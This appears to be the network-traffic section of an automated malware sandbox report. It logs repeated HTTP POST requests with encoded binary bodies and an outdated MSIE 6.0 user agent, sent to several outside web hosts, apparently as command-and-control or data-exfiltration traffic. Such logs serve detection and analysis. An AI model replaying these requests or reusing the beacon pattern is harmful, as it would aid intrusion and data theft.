                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.iamdirt.comCache-Control: no-cacheData Raw: 7a 41 4e 51 4c 73 71 4b 41 47 6f 6d 59 6b 52 55 4c 58 74 38 59 34 31 69 76 50 56 36 79 69 4d 7a 6e 70 48 2b 35 59 64 35 49 72 65 4a 4f 37 36 57 4c 4b 70 73 33 77 70 55 49 48 2b 74 52 36 75 48 41 6f 6f 41 74 56 32 6c 37 2f 47 67 73 6f 69 67 52 61 69 65 66 37 76 61 52 42 57 6d 4f 61 4c 6e 78 66 4d 36 4f 35 2f 43 41 4c 52 77 73 42 51 58 74 55 45 56 61 2b 77 4c 38 4a 67 63 2f 42 71 4f 64 75 50 4c 35 6c 6c 4e 6d 41 74 45 78 61 4a 39 33 61 49 30 77 47 44 34 6a 36 41 44 43 31 6c 79 2b 30 6a 37 4a 6a 6b 45 41 39 34 44 49 45 54 51 34 54 38 4d 4d 78 54 61 7a 70 4a 6c 4f 67 46 33 77 34 75 4b 75 73 2f 34 59 68 43 66 62 32 31 36 39 76 53 6f 38 65 76 65 65 49 58 33 6f 56 79 66 71 53 46 37 53 39 54 64 6d 52 48 45 4a 56 2b 32 67 69 41 74 50 51 65 70 31 34 54 51 37 6b 42 34 54 7a 6f 72 34 79 74 75 57 56 46 37 30 65 75 79 52 78 55 4d 6d 33 64 58 37 5a 4e 38 37 37 31 35 44 32 5a 49 4a 4b 73 33 55 37 76 77 41 4f 57 36 61 69 76 6f 45 59 5a 77 4c 63 6a 6e 53 31 37 38 66 41 6a 78 35 4d 33 59 73 49 2f 67 71 48 6c 72 2b 58 36 4d 4d 76 75 45 48 4c 59 49 67 64 52 6e 5a 69 6f 78 54 72 6d 4c 74 30 58 33 55 6a 78 69 5a 46 54 74 61 46 6b 4d 6c 6d 7a 63 48 4b 2b 79 4d 43 43 78 7a 6b 64 72 65 4f 53 64 63 6e 66 2b 49 39 34 71 63 52 37 62 53 6d 47 6a 6d 57 35 41 42 6f 57 4b 79 7a 30 4d 79 64 6a 69 6f 69 63 6e 53 70 74 76 61 46 7a 7a 38 59 51 34 6e 4d 64 6e 39 36 66 35 5a 5a 48 37 78 4e 53 30 55 38 74 70 50 4a 4a 39 70 59 55 5a 51 7a 64 39 6c 61 66 75 75 46 75 6f 67 4d 45 68 32 35 36 77 62 75 37 6f 61 2b 39 39 38 49 32 76 44 6e 4d 73 62 77 65 70 7a 36 33 71 51 34 65 73 65 70 57 71 2b 4d 51 32 57 64 55 5a 6a 5a 59 49 49 4b 53 4d 44 2b 7a 62 59 65 58 6e 76 52 74 67 45 69 6a 44 73 78 58 63 64 55 68 7a 31 33 79 59 Data Ascii: zANQLsqKAGomYkRULXt8Y41ivPV6yiMznpH+5Yd5IreJO76WLKps3wpUIH+tR6uHAooAtV2l7/GgsoigRaief7vaRBWmOaLnxfM6O5/CALRwsBQXtUEVa+wL8Jgc/BqOduPL5llNmAtExaJ93aI0wGD4j6ADC1ly+0j7JjkEA94DIETQ4T8MMxTazpJlOgF3w4uKus/4YhCfb2169vSo8eveeIX3oVyfqSF7S9TdmRHEJV+2giAtPQep14TQ7kB4Tzor4ytuWVF70euyRxUMm3dX7ZN87715D2ZIJKs3U7vwAOW6aivoEYZwLcjnS178fAjx5M3YsI/gqHlr+X6MMvuEHLYIgdRnZioxTrmLt0X3UjxiZFTtaFkMlmzcHK+yMCCxzkdreOSdcnf+I94qcR7bSmGjmW5ABoWKyz0MydjioicnSptvaFzz8YQ4nMdn96f5ZZH7xNS0U8tpPJJ9pYUZQzd9lafuuFuogMEh256wbu7oa+998I2vDnMsbwepz63qQ4esepWq+MQ2WdUZjZYIIKSMD+zbYeXnvRtgEijDsxXcdUhz13yY
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 52 6e 57 38 2b 59 43 46 39 6d 6c 2f 6b 65 39 4f 55 37 71 6b 34 4c 4e 49 43 49 64 6f 77 76 2b 77 74 4e 53 52 75 32 4e 4c 48 2f 55 75 38 51 5a 4d 65 4c 52 74 47 66 55 51 67 37 31 6b 73 6e 4b 50 64 4d 35 72 46 35 78 34 4e 2b 54 70 4e 32 43 74 62 48 35 43 61 30 35 7a 74 71 64 33 51 56 6e 48 57 4d 58 30 62 6e 62 75 41 34 73 39 70 4e 6b 66 42 55 2b 73 49 77 76 30 70 71 38 77 66 77 6b 65 70 39 4a 49 36 32 35 71 30 55 35 6c 4d 43 74 2b 4d 66 78 78 75 48 5a 56 62 59 69 4b 72 4c 36 78 42 34 48 77 55 48 74 71 5a 7a 5a 34 67 76 78 76 55 52 6a 62 49 39 45 6c 54 33 7a 65 39 6f 59 34 59 6d 69 73 59 77 63 71 6a 4b 46 56 61 4c 53 49 47 6e 51 79 48 39 36 31 49 4d 64 41 4b 35 63 6a 5a 70 4d 4a 45 2f 67 2f 48 58 49 33 65 46 76 77 52 6e 71 49 44 56 51 32 65 66 77 36 74 67 51 77 30 69 69 45 37 78 68 5a 69 31 2b 74 50 69 78 61 5a 46 49 46 5a 52 2f 63 4a 37 33 55 2f 77 67 61 66 55 39 7a 31 54 35 32 39 36 31 65 59 36 43 37 55 58 32 4e 73 78 70 64 54 69 50 52 2f 42 30 4b 69 32 55 48 6e 76 6f 57 4d 54 70 53 46 59 33 49 57 59 37 72 79 4f 55 39 6d 67 32 4a 64 41 7a 2b 76 4d 38 31 31 51 4b 37 70 38 52 64 45 52 49 5a 6a 30 30 42 62 42 6f 46 49 30 2f 6c 4d 6a 41 63 52 4b 46 30 70 6c 75 76 51 64 41 49 65 54 43 70 73 42 47 38 38 56 71 49 70 6d 38 45 4b 2b 45 35 4f 31 57 6f 32 44 6b 51 6c 58 41 41 78 47 53 4e 2f 34 66 5a 49 31 52 4f 67 43 43 4f 64 59 68 62 73 51 6a 51 62 36 69 6e 6a 69 61 79 31 52 78 4b 4f 6d 6a 59 32 6d 4f 74 42 33 36 63 36 72 71 65 68 37 66 4a 4b 6f 78 30 6a 77 38 58 33 39 6e 55 6e 64 4b 50 76 34 33 70 6f 6d 37 4d 68 2f 4e 38 4a 37 7a 4f 74 4c 59 77 2f 49 4d 61 41 56 43 52 53 59 35 7a 74 68 58 58 73 4a 56 76 47 59 68 64 2f 53 4a 47 6c 68 4f 66 31 4e 46 57 61 5a 4d 59 5a 41 34 45 68 68 42 78 38 69 2f 33 30 51 6e 48 32 45 31 4c 69 67 3d 3d Data Ascii: RnW8+YCF9ml/ke9OU7qk4LNICIdowv+wtNSRu2NLH/Uu8QZMeLRtGfUQg71ksnKPdM5rF5x4N+TpN2CtbH5Ca05ztqd3QVnHWMX0bnbuA4s9pNkfBU+sIwv0pq8wfwkep9JI625q0U5lMCt+MfxxuHZVbYiKrL6xB4HwUHtqZzZ4gvxvURjbI9ElT3ze9oY4YmisYwcqjKFVaLSIGnQyH961IMdAK5cjZpMJE/g/HXI3eFvwRnqIDVQ2efw6tgQw0iiE7xhZi1+tPixaZFIFZR/cJ73U/wgafU9z1T52961eY6C7UX2NsxpdTiPR/B0Ki2UHnvoWMTpSFY3IWY7ryOU9mg2JdAz+vM811QK7p8RdERIZj00BbBoFI0/lMjAcRKF0pluvQdAIeTCpsBG88VqIpm8EK+E5O1Wo2DkQlXAAxGSN/4fZI1ROgCCOdYhbsQjQb6injiay1RxKOmjY2mOtB36c6rqeh7fJKox0jw8X39nUndKPv43pom7Mh/N8J7zOtLYw/IMaAVCRSY5zthXXsJVvGYhd/SJGlhOf1NFWaZMYZA4EhhBx8i/30QnH2E1Lig==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wifi4all.nlCache-Control: no-cacheData Raw: 41 41 4e 65 67 79 57 65 43 32 72 2b 33 4e 68 62 7a 4c 6d 6c 73 5a 37 5a 36 47 42 7a 48 45 70 69 4b 65 32 2b 51 31 42 39 71 6f 6c 53 39 73 71 42 50 48 4c 31 47 4c 47 6b 35 30 6e 34 45 4d 4c 2f 79 77 2f 73 50 71 43 55 53 36 6e 55 6f 75 71 42 5a 31 48 4f 67 77 75 38 79 6a 78 4d 2f 48 4f 6e 61 54 41 6b 42 74 77 47 46 66 59 75 2f 61 73 51 75 65 62 59 7a 63 69 47 45 4d 2b 6a 68 6b 72 35 49 4e 61 78 7a 79 31 78 70 51 39 6c 6f 55 48 31 53 70 49 65 77 50 5a 44 5a 6a 47 33 48 6f 44 4c 2b 73 38 4e 44 31 63 34 6e 75 42 70 39 70 70 4a 4e 71 36 62 52 67 30 56 69 7a 42 66 37 46 74 30 33 77 62 54 59 34 46 45 30 41 35 78 6d 64 5a 58 69 6d 46 68 6e 6e 47 57 2f 74 48 42 62 6a 7a 58 69 46 4e 37 57 5a 56 56 35 72 5a 6f 6c 79 50 30 33 59 68 67 32 4c 76 59 75 45 43 47 50 63 39 52 64 32 31 5a 2b 33 56 76 49 39 76 77 6e 6e 42 4c 4e 66 46 58 39 67 6c 50 79 36 69 78 39 44 69 6e 4f 77 47 75 56 6f 34 6a 4d 34 38 68 36 52 6a 4f 6b 79 33 31 44 35 75 4e 58 79 39 66 4c 54 2f 59 4c 77 59 51 70 4f 42 71 71 49 64 4a 69 42 4c 6e 31 59 78 69 59 4f 49 4a 53 78 38 43 38 39 45 72 32 53 77 2b 49 53 74 71 57 4b 65 37 56 56 7a 72 74 36 65 4d 72 4f 4a 4f 42 59 4a 6b 34 50 77 74 38 4e 43 47 67 6c 6e 67 42 48 41 37 4e 5a 68 39 58 34 67 34 5a 51 59 70 6f 79 68 38 70 45 4a 31 70 74 54 45 6f 56 30 2b 37 4a 70 41 6f 76 55 43 59 69 78 57 38 6f 55 55 4d 39 62 75 48 48 49 61 79 4f 49 56 6d 6b 53 47 69 66 71 38 70 75 61 78 78 47 57 75 67 69 55 39 67 7a 71 30 34 41 42 47 57 6f 4d 59 6e 54 69 52 37 50 41 53 64 71 70 69 6c 4d 4f 54 75 30 66 33 62 42 34 79 61 64 5a 65 78 75 31 50 61 4d 70 75 35 58 71 56 67 6c 71 45 50 6c 45 4b 5a 53 68 2b 59 39 72 33 39 63 42 32 50 73 4f 59 34 45 75 44 65 73 64 6a 51 79 61 76 74 66 43 4e 48 77 4b 69 51 79 43 68 Data Ascii: AANegyWeC2r+3NhbzLmlsZ7Z6GBzHEpiKe2+Q1B9qolS9sqBPHL1GLGk50n4EML/yw/sPqCUS6nUouqBZ1HOgwu8yjxM/HOnaTAkBtwGFfYu/asQuebYzciGEM+jhkr5INaxzy1xpQ9loUH1SpIewPZDZjG3HoDL+s8ND1c4nuBp9ppJNq6bRg0VizBf7Ft03wbTY4FE0A5xmdZXimFhnnGW/tHBbjzXiFN7WZVV5rZolyP03Yhg2LvYuECGPc9Rd21Z+3VvI9vwnnBLNfFX9glPy6ix9DinOwGuVo4jM48h6RjOky31D5uNXy9fLT/YLwYQpOBqqIdJiBLn1YxiYOIJSx8C89Er2Sw+IStqWKe7VVzrt6eMrOJOBYJk4Pwt8NCGglngBHA7NZh9X4g4ZQYpoyh8pEJ1ptTEoV0+7JpAovUCYixW8oUUM9buHHIayOIVmkSGifq8puaxxGWugiU9gzq04ABGWoMYnTiR7PASdqpilMOTu0f3bB4yadZexu1PaMpu5XqVglqEPlEKZSh+Y9r39cB2PsOY4EuDesdjQyavtfCNHwKiQyCh
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 52 6e 57 38 2b 59 43 46 39 6d 6c 2f 6b 65 39 4f 55 37 71 6b 34 4c 4e 49 43 49 64 6f 77 76 2b 77 74 4e 53 52 75 32 4e 4c 48 2f 55 75 38 51 5a 4d 65 4c 52 74 47 66 55 51 67 37 31 6b 73 6e 4b 50 64 4d 35 72 46 35 78 34 4e 2b 54 70 4e 32 43 74 62 48 35 43 61 30 35 7a 74 71 64 33 51 56 6e 48 57 4d 58 30 62 6e 62 75 41 34 73 39 70 4e 6b 66 42 55 2b 73 49 77 76 30 70 71 38 77 66 77 6b 65 70 39 4a 49 36 32 35 71 30 55 35 6c 4d 43 74 2b 4d 66 78 78 75 48 5a 56 62 59 69 4b 72 4c 36 78 42 34 48 77 55 48 74 71 5a 7a 5a 34 67 76 78 76 55 52 6a 62 49 39 45 6c 54 33 7a 65 39 6f 59 34 59 6d 69 73 59 77 63 71 6a 4b 46 56 61 4c 53 49 47 6e 51 79 48 39 36 31 49 4d 64 41 4b 35 63 6a 5a 70 4d 4a 45 2f 67 2f 48 58 49 33 65 46 76 77 52 6e 71 49 44 56 51 32 65 66 77 36 74 67 51 77 30 69 69 45 37 78 68 5a 69 31 2b 74 50 69 78 61 5a 46 49 46 5a 52 2f 63 4a 37 33 55 2f 77 67 61 66 55 39 7a 31 54 35 32 39 36 31 65 59 36 43 37 55 58 32 4e 73 78 70 64 54 69 50 52 2f 42 30 4b 69 32 55 48 6e 76 6f 57 4d 54 70 53 46 59 33 49 57 59 37 72 79 4f 55 39 6d 67 32 4a 64 41 7a 2b 76 4d 38 31 31 51 4b 37 70 38 52 64 45 52 49 5a 6a 30 30 42 62 42 6f 46 49 30 2f 6c 4d 6a 41 63 52 4b 46 30 70 6c 75 76 51 64 41 49 65 54 43 70 73 42 47 38 38 56 71 49 70 6d 38 45 4b 2b 45 35 4f 31 57 6f 32 44 6b 51 6c 58 41 41 78 47 53 4e 2f 34 66 5a 49 31 52 4f 67 43 43 4f 64 59 68 62 73 51 6a 51 62 36 69 6e 6a 69 61 79 31 52 78 4b 4f 6d 6a 59 32 6d 4f 74 42 33 36 63 36 72 71 65 68 37 66 4a 4b 6f 78 30 6a 77 38 58 33 39 6e 55 6e 64 4b 50 76 34 33 70 6f 6d 37 4d 68 2f 4e 38 4a 37 7a 4f 74 4c 59 77 2f 49 4d 61 41 56 43 52 53 59 35 7a 74 68 58 58 73 4a 56 76 47 59 68 64 2f 53 4a 47 6c 68 4f 66 31 4e 46 57 61 5a 4d 59 5a 41 34 45 68 68 42 78 38 69 2f 33 30 51 6e 48 32 45 31 4c 69 67 3d 3d Data Ascii: RnW8+YCF9ml/ke9OU7qk4LNICIdowv+wtNSRu2NLH/Uu8QZMeLRtGfUQg71ksnKPdM5rF5x4N+TpN2CtbH5Ca05ztqd3QVnHWMX0bnbuA4s9pNkfBU+sIwv0pq8wfwkep9JI625q0U5lMCt+MfxxuHZVbYiKrL6xB4HwUHtqZzZ4gvxvURjbI9ElT3ze9oY4YmisYwcqjKFVaLSIGnQyH961IMdAK5cjZpMJE/g/HXI3eFvwRnqIDVQ2efw6tgQw0iiE7xhZi1+tPixaZFIFZR/cJ73U/wgafU9z1T52961eY6C7UX2NsxpdTiPR/B0Ki2UHnvoWMTpSFY3IWY7ryOU9mg2JdAz+vM811QK7p8RdERIZj00BbBoFI0/lMjAcRKF0pluvQdAIeTCpsBG88VqIpm8EK+E5O1Wo2DkQlXAAxGSN/4fZI1ROgCCOdYhbsQjQb6injiay1RxKOmjY2mOtB36c6rqeh7fJKox0jw8X39nUndKPv43pom7Mh/N8J7zOtLYw/IMaAVCRSY5zthXXsJVvGYhd/SJGlhOf1NFWaZMYZA4EhhBx8i/30QnH2E1Lig==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 74 68 44 34 54 73 49 36 45 6d 70 57 6a 50 61 57 74 54 75 33 6e 30 57 70 35 69 4c 53 31 51 61 6b 46 67 30 44 79 70 6c 39 4e 45 70 51 39 6f 2b 6d 32 33 61 52 59 44 62 57 44 44 51 4f 55 2b 64 6c 6e 6a 75 46 50 59 65 54 69 63 4f 71 76 30 7a 35 50 6d 57 58 68 43 62 73 73 7a 50 46 70 43 4e 44 5a 63 31 31 35 44 34 32 44 6a 64 44 6b 2b 53 54 56 5a 35 77 51 47 2b 53 52 46 6c 43 59 73 6b 6a 59 49 44 6f 68 59 79 31 34 57 53 6e 37 31 66 50 33 76 6d 38 51 49 42 41 49 39 67 6c 61 48 37 4f 69 4e 4e 54 4e 65 49 44 68 32 73 48 57 42 34 6d 62 64 42 35 6c 4c 39 64 42 4e 61 52 70 42 61 58 34 44 58 41 55 39 74 51 47 69 73 4c 36 2f 38 5a 76 47 46 6e 44 70 52 53 43 72 41 55 53 6c 37 62 57 4a 65 32 36 6f 37 58 77 56 68 79 78 46 46 4b 61 49 72 44 4a 45 5a 4b 30 31 6d 35 69 38 31 67 4a 4c 44 32 68 51 7a 6a 37 4b 68 4c 58 71 76 65 48 42 38 62 4c 63 55 56 4b 55 4e 47 59 61 67 47 34 59 4f 66 6c 41 53 35 31 63 5a 39 33 56 6a 32 30 74 58 32 42 4b 48 6b 71 2b 69 56 53 39 66 38 6b 78 6a 57 36 75 66 46 6e 71 53 6e 70 72 50 51 59 49 59 52 59 4b 48 5a 71 74 32 38 4a 77 4e 6d 65 62 66 35 44 46 78 63 72 45 34 78 6e 66 56 69 68 45 4e 64 42 42 44 74 61 4a 62 6a 58 53 34 6b 54 68 79 67 57 62 77 48 54 7a 35 6d 67 45 6e 79 78 4b 39 69 6c 51 49 2b 45 65 39 30 62 38 39 35 6f 79 50 54 34 51 43 5a 37 57 42 78 64 55 55 73 46 70 4f 65 45 43 77 6a 52 6d 36 30 5a 55 4a 74 42 59 36 5a 57 62 4b 33 4f 63 73 31 4a 51 64 77 53 42 69 78 43 56 50 36 63 76 6b 4d 38 65 49 72 78 6f 4c 41 31 57 5a 67 4d 50 37 57 69 74 77 4d 6c 31 31 5a 35 70 2f 4a 41 7a 31 2f 34 2f 54 4b 32 57 72 70 4d 76 62 66 66 50 42 75 6e 56 47 51 78 52 79 79 6c 39 79 73 32 69 59 3d Data Ascii: thD4TsI6EmpWjPaWtTu3n0Wp5iLS1QakFg0Dypl9NEpQ9o+m23aRYDbWDDQOU+dlnjuFPYeTicOqv0z5PmWXhCbsszPFpCNDZc115D42DjdDk+STVZ5wQG+SRFlCYskjYIDohYy14WSn71fP3vm8QIBAI9glaH7OiNNTNeIDh2sHWB4mbdB5lL9dBNaRpBaX4DXAU9tQGisL6/8ZvGFnDpRSCrAUSl7bWJe26o7XwVhyxFFKaIrDJEZK01m5i81gJLD2hQzj7KhLXqveHB8bLcUVKUNGYagG4YOflAS51cZ93Vj20tX2BKHkq+iVS9f8kxjW6ufFnqSnprPQYIYRYKHZqt28JwNmebf5DFxcrE4xnfVihENdBBDtaJbjXS4kThygWbwHTz5mgEnyxK9ilQI+Ee90b895oyPT4QCZ7WBxdUUsFpOeECwjRm60ZUJtBY6ZWbK3Ocs1JQdwSBixCVP6cvkM8eIrxoLA1WZgMP7WitwMl11Z5p/JAz1/4/TK2WrpMvbffPBunVGQxRyyl9ys2iY=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 74 68 44 34 54 73 49 36 45 6d 70 57 6a 50 61 57 74 54 75 33 6e 30 57 70 35 69 4c 53 31 51 61 6b 46 67 30 44 79 70 6c 39 4e 45 70 51 39 6f 2b 6d 32 33 61 52 59 44 62 57 44 44 51 4f 55 2b 64 6c 6e 6a 75 46 50 59 65 54 69 63 4f 71 76 30 7a 35 50 6d 57 58 68 43 62 73 73 7a 50 46 70 43 4e 44 5a 63 31 31 35 44 34 32 44 6a 64 44 6b 2b 53 54 56 5a 35 77 51 47 2b 53 52 46 6c 43 59 73 6b 6a 59 49 44 6f 68 59 79 31 34 57 53 6e 37 31 66 50 33 76 6d 38 51 49 42 41 49 39 67 6c 61 48 37 4f 69 4e 4e 54 4e 65 49 44 68 32 73 48 57 42 34 6d 62 64 42 35 6c 4c 39 64 42 4e 61 52 70 42 61 58 34 44 58 41 55 39 74 51 47 69 73 4c 36 2f 38 5a 76 47 46 6e 44 70 52 53 43 72 41 55 53 6c 37 62 57 4a 65 32 36 6f 37 58 77 56 68 79 78 46 46 4b 61 49 72 44 4a 45 5a 4b 30 31 6d 35 69 38 31 67 4a 4c 44 32 68 51 7a 6a 37 4b 68 4c 58 71 76 65 48 42 38 62 4c 63 55 56 4b 55 4e 47 59 61 67 47 34 59 4f 66 6c 41 53 35 31 63 5a 39 33 56 6a 32 30 74 58 32 42 4b 48 6b 71 2b 69 56 53 39 66 38 6b 78 6a 57 36 75 66 46 6e 71 53 6e 70 72 50 51 59 49 59 52 59 4b 48 5a 71 74 32 38 4a 77 4e 6d 65 62 66 35 44 46 78 63 72 45 34 78 6e 66 56 69 68 45 4e 64 42 42 44 74 61 4a 62 6a 58 53 34 6b 54 68 79 67 57 62 77 48 54 7a 35 6d 67 45 6e 79 78 4b 39 69 6c 51 49 2b 45 65 39 30 62 38 39 35 6f 79 50 54 34 51 43 5a 37 57 42 78 64 55 55 73 46 70 4f 65 45 43 77 6a 52 6d 36 30 5a 55 4a 74 42 59 36 5a 57 62 4b 33 4f 63 73 31 4a 51 64 77 53 42 69 78 43 56 50 36 63 76 6b 4d 38 65 49 72 78 6f 4c 41 31 57 5a 67 4d 50 37 57 69 74 77 4d 6c 31 31 5a 35 70 2f 4a 41 7a 31 2f 34 2f 54 4b 32 57 72 70 4d 76 62 66 66 50 42 75 6e 56 47 51 78 52 79 79 6c 39 79 73 32 69 59 3d Data Ascii: thD4TsI6EmpWjPaWtTu3n0Wp5iLS1QakFg0Dypl9NEpQ9o+m23aRYDbWDDQOU+dlnjuFPYeTicOqv0z5PmWXhCbsszPFpCNDZc115D42DjdDk+STVZ5wQG+SRFlCYskjYIDohYy14WSn71fP3vm8QIBAI9glaH7OiNNTNeIDh2sHWB4mbdB5lL9dBNaRpBaX4DXAU9tQGisL6/8ZvGFnDpRSCrAUSl7bWJe26o7XwVhyxFFKaIrDJEZK01m5i81gJLD2hQzj7KhLXqveHB8bLcUVKUNGYagG4YOflAS51cZ93Vj20tX2BKHkq+iVS9f8kxjW6ufFnqSnprPQYIYRYKHZqt28JwNmebf5DFxcrE4xnfVihENdBBDtaJbjXS4kThygWbwHTz5mgEnyxK9ilQI+Ee90b895oyPT4QCZ7WBxdUUsFpOeECwjRm60ZUJtBY6ZWbK3Ocs1JQdwSBixCVP6cvkM8eIrxoLA1WZgMP7WitwMl11Z5p/JAz1/4/TK2WrpMvbffPBunVGQxRyyl9ys2iY=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.com-sit.comCache-Control: no-cacheData Raw: 69 47 59 4d 52 48 4f 41 49 6d 72 45 79 6c 46 4f 75 6b 75 59 36 68 78 4c 61 43 7a 5a 58 37 45 75 56 33 33 47 71 34 78 5a 35 54 6a 54 6b 4a 46 6f 62 41 55 36 66 33 4e 79 6c 5a 70 76 77 4e 2b 57 4d 71 4c 62 73 65 53 6e 38 38 65 6f 2f 43 47 30 53 71 39 61 6d 57 2b 76 79 6b 54 48 36 6d 35 62 38 32 56 39 6e 50 73 77 66 73 77 49 62 2b 49 5a 67 62 70 4e 6d 36 31 77 6b 64 2f 6d 6e 46 79 65 6f 4a 68 73 37 36 73 4a 72 76 33 78 76 2b 6a 74 53 46 4e 2b 49 7a 33 4c 35 62 54 4a 67 4e 65 38 64 45 6d 38 37 7a 57 51 51 69 4f 75 79 30 59 65 54 48 78 68 70 59 6d 4e 31 33 6b 5a 4a 50 52 43 31 75 73 56 58 6e 46 77 2b 30 6c 74 53 62 4e 36 4a 76 6d 6a 73 77 55 76 7a 33 6f 6e 66 77 64 63 67 64 34 64 54 76 44 2f 34 50 41 56 6c 75 51 75 37 59 76 63 66 55 46 39 71 56 55 2b 38 52 65 6e 33 6d 6c 2f 30 41 72 61 53 32 77 76 77 76 36 62 5a 6b 68 75 72 65 41 73 74 75 74 78 35 79 6f 66 4b 4c 6d 4c 64 44 70 4a 65 56 43 63 70 61 69 62 61 69 4d 6a 75 70 48 42 72 6b 79 77 58 75 58 39 6a 4b 41 7a 35 59 35 68 68 58 44 4b 6f 2f 44 54 6b 4a 64 74 2b 4e 6a 6c 57 68 6e 68 63 55 54 73 7a 2f 30 30 43 72 65 76 6e 52 78 6a 46 7a 59 65 52 4a 45 35 51 42 66 6b 75 48 44 4c 69 51 57 52 52 31 74 5a 6b 57 51 36 47 38 57 65 58 49 36 4a 31 45 30 79 4d 30 36 36 72 47 63 58 6e 42 6d 44 36 63 54 75 32 6f 55 44 76 45 41 4d 74 42 6c 53 36 73 4b 73 6d 4a 70 30 65 66 34 6c 32 38 66 4f 4c 66 62 6e 51 68 65 46 66 69 42 6d 70 7a 57 69 64 39 63 6d 57 74 6a 75 51 6a 35 48 4e 31 4a 56 38 4f 33 67 6b 71 56 45 65 42 4c 32 32 69 61 59 76 71 4b 42 61 7a 6c 62 43 38 7a 52 58 59 30 56 6d 62 4f 78 68 37 46 53 6b 6b 38 6f 5a 74 53 38 47 6c 75 67 Data Ascii: iGYMRHOAImrEylFOukuY6hxLaCzZX7EuV33Gq4xZ5TjTkJFobAU6f3NylZpvwN+WMqLbseSn88eo/CG0Sq9amW+vykTH6m5b82V9nPswfswIb+IZgbpNm61wkd/mnFyeoJhs76sJrv3xv+jtSFN+Iz3L5bTJgNe8dEm87zWQQiOuy0YeTHxhpYmN13kZJPRC1usVXnFw+0ltSbN6JvmjswUvz3onfwdcgd4dTvD/4PAVluQu7YvcfUF9qVU+8Ren3ml/0AraS2wvwv6bZkhureAstutx5yofKLmLdDpJeVCcpaibaiMjupHBrkywXuX9jKAz5Y5hhXDKo/DTkJdt+NjlWhnhcUTsz/00CrevnRxjFzYeRJE5QBfkuHDLiQWRR1tZkWQ6G8WeXI6J1E0yM066rGcXnBmD6cTu2oUDvEAMtBlS6sKsmJp0ef4l28fOLfbnQheFfiBmpzWid9cmWtjuQj5HN1JV8O3gkqVEeBL22iaYvqKBazlbC8zRXY0VmbOxh7FSkk8oZtS8Glug
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.snugpak.comCache-Control: no-cacheData Raw: 62 36 4f 6e 6f 30 69 62 4a 57 72 67 6c 39 6d 70 69 34 59 2b 78 72 75 4a 73 55 33 51 54 30 6d 52 2f 4a 70 73 70 6e 58 67 55 76 62 66 6f 2b 33 65 73 4c 4b 44 73 63 74 35 70 56 50 6d 36 4f 65 62 58 33 36 62 46 44 76 4c 6c 4d 37 49 66 67 2b 4e 6a 53 35 4d 6d 76 62 61 59 6c 69 48 35 65 55 79 65 39 58 6f 46 43 77 6e 49 30 55 6c 64 34 4c 65 7a 73 6c 51 49 4d 50 52 7a 6f 38 66 6a 48 73 41 66 2b 76 6f 43 37 77 64 37 33 59 7a 58 68 76 7a 63 48 75 31 50 59 75 70 64 6b 4e 77 47 6e 39 32 4e 68 39 42 44 71 4b 78 4b 74 70 58 6e 69 70 6b 42 64 4a 41 6b 34 53 2b 36 6f 76 37 2f 72 42 32 79 4d 6a 74 77 32 35 46 57 50 72 55 50 77 51 48 7a 75 43 4b 6a 2f 43 36 73 78 4f 6d 58 31 49 4b 74 4b 46 39 76 43 79 55 6e 6a 55 4a 62 4e 73 2f 75 4b 4d 2f 53 59 71 69 31 76 69 55 53 48 78 46 65 4b 76 43 36 37 36 4b 4b 63 4c 74 38 47 76 4f 6e 39 4b 6c 76 74 77 46 33 44 2b 70 7a 70 55 54 4e 76 4e 77 44 4c 41 71 4f 4c 2f 65 57 37 4d 6f 7a 51 53 44 70 70 44 6f 67 63 67 4d 30 76 34 74 64 39 66 44 48 49 2b 30 61 68 79 6d 6e 55 41 67 56 36 6b 33 4a 6b 79 6e 79 6e 4c 38 42 4e 6b 68 77 75 64 7a 75 75 4b 6d 4a 6a 2b 4d 69 30 52 53 42 4c 59 71 57 2b 49 46 53 42 59 2b 42 6b 46 6a 6e 33 2b 30 72 35 59 33 6c 74 62 53 30 39 35 70 6b 36 58 33 75 44 67 69 73 6f 56 33 54 47 6b 5a 48 6f 4c 5a 4b 49 6a 6f 71 64 48 39 32 66 49 52 72 61 32 46 4b 6b 61 35 49 49 66 61 76 39 78 78 44 4c 33 74 4a 31 66 61 53 4c 72 32 33 47 2f 70 75 38 6d 54 32 43 76 53 34 4d 7a 75 4d 71 73 7a 38 56 57 34 47 55 6d 6b 73 79 59 47 48 4f 79 4f 6e 56 74 49 72 52 74 30 39 65 67 70 33 78 56 55 47 38 68 77 6a 59 77 79 78 6a 32 33 41 58 32 4c 55 4f 73 3d Data Ascii: 